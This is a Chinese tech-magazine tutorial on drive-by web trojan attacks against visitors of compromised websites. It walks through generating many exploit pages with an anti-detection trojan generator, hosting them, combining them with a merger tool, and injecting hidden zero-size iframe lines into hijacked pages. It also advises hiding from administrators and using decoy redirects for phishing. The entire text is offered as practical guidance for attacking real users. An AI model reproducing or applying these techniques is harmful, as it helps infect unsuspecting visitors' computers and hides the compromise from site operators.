【IT168 专稿】拿下一个网站的控制权后，黑客们通常都会挂上自己的网页木马来各取所需。不过这里存在一个问题，就是网页木马都是针对一个系统或者软件的漏洞进行攻击的，所以你挂上的木马，要想载入到浏览用户的主机内，还得看看它有没有符合你马儿攻击的漏洞，这样一来马儿入侵的概率就会变的很低。如果你想让马儿威力变大，也不是没有办法，接下来笔者将带领一同大家踏上将所有网页木马聚集在一起的旅程。

　　一、聚集的网页木马进行上传

　　看过笔者文章的朋友，相信一定还记得的黑手刃这款免杀网页木马，其强大的网马生成功能，以及集合了众多新漏洞，的确给大家留下了很深的印象，这里笔者还以黑手刃免杀生成器为例。

　　在“黑手刃免杀生成器”界面内，勾选所有漏洞项目的复选框后，在上方文本第一个栏内输入上传木马的服务端地址。操作完毕后，单击“生成”按钮，此时就可在黑手刃安装目录里，生成很多个网页木马攻击文件（图01）。

　　然后我们要做的就是将这些木马文件，全都上传到自己的空间里，以便今后挂马使用。不过要注意是挑选空间时，最好挑选一些比较稳定的空间，这样可以大大提高木马入侵的概率。

　　二、合并多个网页木马

　　建立好自己的网页木马后，要想将其插入到已经拥有Shell的网站页面，大家只要使用框架挂马语句即可。例如在受害主页面里插入<iframe src=“网页木马地址” width=0 height=0></iframe>代码，就可在其页面里成功挂上自己的网页木马了。不过一条语句只能挂一个木马，这样攻击效率就会很低，如果添加很多条语句来挂马，就拿黑手刃生成的17个网页木马来说，你要在它的页面插入17条挂马语句，虽然攻击效果是很好，但是很容易被管理员发现。因此这里我们不妨聘请专业的网马合并器工具，来让这些木马统一一下。

　　打开网页木马合并器，将自己上传的N多网页木马地址，分别插入并且替换到“网页地址1”---“网页木马9”后，单击“生成”按钮，就可在网页木马合并器目录里，生成一个名为6331905.html的文件（图02）。这个文件就是九个网页木马的结合体，我们接下来只要将该文件，上传到自己的空间后，然后像以前一样按部就班的在网页中插入<iframe src=“九个网页木马的结合体地址” width=0 height=0></iframe>语句即可，这样九个网页木马就已经成功挂上了，而且只用一条语句还不容易被管理员发现。当以后用户访问此挂马页后，就会被这九个网页木马同时攻击，从而大大提高了中马的概率。

　　如果你要想让木马的威力更大一些，例如黑手刃有17个网页木马，我们只插入了9个，还差8个网页木马需要添加，那么该如何将剩余的网页木马插入呢？这里以记事本形式，打开九个网马结合体文件，从中找到<iframe src=“网马地址” frameborder=“no” scrolling=“no” noresize marginwidth=“0” margingheight=0>这句代码，你会发现以下几句代码也都是重复的，因此这里我们只要复制这行代码，将里面网马地址替换成剩余8个网马地址，然后保存网页文件，在使用上面的挂马语句将新生成的合并网马语句插入，就可以实现插入17个网马的目的了，这样用户在访问挂马页面就会被17个网马攻击。

　　当然你这里不排除你想迷惑浏览用户，达到完美入侵的目的，因此可以在刚才的网页木马合并器最上面框里，输入正常的网页地址，例如默认的http：//www.qq.com地址，然后生成合并网页后，当浏览用户打开这个页时，此时就会弹出QQ网站，同时网页木马也悄悄的加载到了他的主机，相信他在看了官方站点后，做梦都想不到木马黑手已经入侵了他的电脑。

　　不过这种迷惑的功能，在正常的情况下笔者是不建议使用的，因为当用户进入某个网站后，一下弹出与其无关的页面，相信换成谁都会觉得很可疑，有点“此地无银三百两”的意思，所以这个功能最好用到特殊攻击里，例如钓鱼攻击，这样才不会出现适得其反的事情。